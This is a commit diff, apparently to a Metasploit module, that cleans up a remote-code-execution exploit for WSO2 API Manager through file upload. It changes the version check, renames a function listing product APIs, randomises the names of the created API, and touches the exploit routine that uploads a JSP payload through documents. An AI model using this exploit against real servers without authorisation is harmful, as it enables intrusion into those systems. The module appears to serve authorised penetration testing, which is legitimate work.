Clean-up

Author: heyder

modules/exploits/multi/http/wso2_api_manager_file_upload_rce.rb

@@ -89,27 +89,24 @@ def check
 
     authenticate
     res = send_request_cgi(
-      'uri' => normalize_uri(target_uri.path, '/services', '/Version'),
+      'uri' => normalize_uri(target_uri.path, 'services', 'Version'),
       'method' => 'GET',
       'headers' => {
         'Authorization' => "Bearer #{bearer}"
       }
     )
 
-    return Exploit::CheckCode::Unknown unless res&.code == 200 && res&.headers&.[]('Server') =~ /WSO2/
+    return CheckCode::Unknown unless res&.code == 200 && res&.headers&.[]('Server') =~ /WSO2/
 
     xml = res.get_xml_document
     xml.at_xpath('//return').text.match(/WSO2 API Manager-((?:\d\.){2}(?:\d))$/)
     version = Rex::Version.new ::Regexp.last_match(1)
 
-    return CheckCode::Safe('Unable to determine version') unless version
+    return CheckCode::Unknown('Unable to determine version') unless version
 
-    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless
-       version <= Rex::Version.new('4.2.0') ||
-       version <= Rex::Version.new('4.1.0') ||
-       version <= Rex::Version.new('4.0.0') ||
-       version <= Rex::Version.new('3.2.0') ||
-       version <= Rex::Version.new('3.1.0')
+    return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable") unless version.between?(
+      Rex::Version.new('3.1.0'), Rex::Version.new('4.2.0')
+    )
 
     if target.name == 'Automatic'
       # Find the target based on the detected version
@@ -121,10 +118,7 @@ def check
         end
       end
 
-      unless selected_target_index
-        vprint_warning("No matching target found for version #{version}")
-        return CheckCode::Safe("Detected WSO2 API Manager #{version} which is not vulnerable")
-      end
+      return CheckCode::Unknown('Unable to automatically select a target. You might need to set the target manually') unless selected_target_index
 
       # Set the target
       datastore['TARGET'] = selected_target_index
@@ -214,7 +208,7 @@ def authenticate
     end
   end
 
-  def list_api_available
+  def list_product_api
     vprint_status('Listing products APIs...')
 
     res = send_request_cgi(
@@ -298,8 +292,8 @@ def create_product_api
     api_id = create_api['id']
 
     product_api_data = {
-      'name' => 'test3',
-      'context' => 'test3',
+      'name' => Faker::App.name,
+      'context' => Faker::Internet.slug,
       'policies' => ['Unlimited'],
       'apis' => [
         {
@@ -395,7 +389,7 @@ def execute_payload
   def exploit
     doc_name = Rex::Text.rand_text_alpha(4..7)
     authenticate unless bearer
-    api_avaliable = list_api_available
+    api_avaliable = list_product_api
     api_avaliable.each do |product_api|
       doc_id = create_document(product_api['id'], doc_name)
       next unless doc_id
@@ -406,7 +400,6 @@ def exploit
         break
       end
     end
-    # execute_payload
   end
 
   def jsp_filename